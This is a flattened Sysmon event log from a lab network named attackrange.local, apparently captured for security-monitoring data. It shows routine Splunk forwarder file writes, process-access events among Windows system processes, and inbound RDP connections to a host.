23542300x800000000000000062773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.051{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7A3591084BD7B014504360A97BD346D,SHA256=65278FFBAA93B851EFBBD06234614F618AFAC6C30E8EF4C9DAB10EA268BC5C8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049159Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:59.595{85C0FFC9-B7ED-607E-1100-00000000BB01}1000NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=79DFE30BDD3625A7A60E28D7699803B2,SHA256=EB851B9E1C9E0EACDE31F8B5906C6BC5769110334DABD44AF7625B418D891AAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049158Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.805{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54983-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049180Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.767{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C4194483AB068FE234F33BB15D30D9A,SHA256=6B9DCD942AB5DC9BA443874E72B941A787E5B056D89D48C973958DD97C581998,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.957{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EACC-607E-600B-00000000BB01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.957{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.957{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.957{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.957{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.957{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EACC-607E-600B-00000000BB01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000062796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.957{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EACC-607E-600B-00000000BB01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000062795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.958{A7A01FEF-EACC-607E-600B-00000000BB01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000062794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.442{A7A01FEF-EACC-607E-5F0B-00000000BB01}41444476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.285{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EACC-607E-5F0B-00000000BB01}4144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.285{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.285{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.285{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.285{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.285{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EACC-607E-5F0B-00000000BB01}4144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000062787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.285{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EACC-607E-5F0B-00000000BB01}4144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000062786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.286{A7A01FEF-EACC-607E-5F0B-00000000BB01}4144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000062785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.160{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B006BB75DDE1838E3527B9F595D75B4,SHA256=18F3096A82674670D1DFBAD9672096C56857569840FA885F832D4B116C222584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.082{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D30147252E4C9F08255EB4A4BD48DE24,SHA256=C48F5CC169A2A84329DBDF842489D16FA469FE13613BCBE2A31BAAAE703E9B60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049179Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.610{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1500-00000000BB01}1176C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049178Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.610{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1500-00000000BB01}1176C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049177Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.610{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1500-00000000BB01}1176C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000049176Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.408{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56463-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049175Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.829{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52465-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000049174Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EACC-607E-CC06-00000000BB01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049173Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049172Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049171Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\nt